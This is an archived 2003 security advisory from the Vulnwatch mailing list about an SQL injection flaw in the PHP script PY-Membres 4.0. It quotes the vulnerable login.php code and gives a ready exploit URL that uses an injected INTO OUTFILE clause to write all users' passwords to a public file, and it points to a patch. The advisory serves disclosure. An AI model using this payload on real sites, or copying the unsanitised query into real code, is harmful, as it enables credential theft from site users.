|
Vulnwatch
mailing list archives
PY-Membres 4.0 (PHP)
From: "Frog Man" <leseulfrog () hotmail com>
Date: Sun, 06 Apr 2003 20:16:25 +0200
Informations :
°°°°°°°°°°°°°°
Website : http://www.py-scripts.com/
Tested version : 4.0
PHP Config : magic_quotes_gpc=OFF
Problem : SQL Injection
PHP Code/Location :
°°°°°°°°°°°°°°°°°°°
login.php :
------------------------------------------------------------------------
<?
session_start();
session_name("pys");
include("config.php");
include("functions.php");
est_vide($login,"Vous n\'avez pas saisi de login !");
est_vide($pass,"Vous n\'avez pas saisi de mot de passe !");
connexiondb();
$sql = "SELECT passwd FROM $db_table WHERE login='$login'";
$req = mysql_query($sql) or die('Erreur SQL
!<br>'.$sql.'<br>'.mysql_error());
$data = mysql_fetch_array($req);
if($data['passwd'] != $pass)
{
echo "<p>Mauvais login / password. Merci de recommencer</p>";
mysql_close();
exit;
}
else
{
$ploginy=$login;
session_register('ploginy');
$ip=$REMOTE_ADDR;
$host=gethostbyaddr($ip);
$log=date("d/m/Y à H\hi | ");
$log.=$ip." | ".$host;
$action = mysql_query("UPDATE $db_table SET lastlog='$log' WHERE
login='$ploginy'") or die (mysql_error()) ;
mysql_close();
Header("Location: membre.php");
}
?>
------------------------------------------------------------------------
Exploit :
°°°°°°°°°
http://[target]/login.php?login='%20OR%20ISNULL(NULL)%20INTO%20OUTFILE%20'/path/to/site/file.txt&pass=1
will save all users passwords into the file http://[target]/file.txt.
Solution :
°°°°°°°°°°
A patch can be found on http://www.phpsecure.info.
More Details In French :
°°°°°°°°°°°°°°°°°°°°°°°°
http://www.frog-man.org/tutos/PY-Membres4.0.txt
frog-m () n
_________________________________________________________________
 By Date 
By Thread
Current thread:
- PY-Membres 4.0 (PHP) Frog Man (Apr 06)
| 
Intro
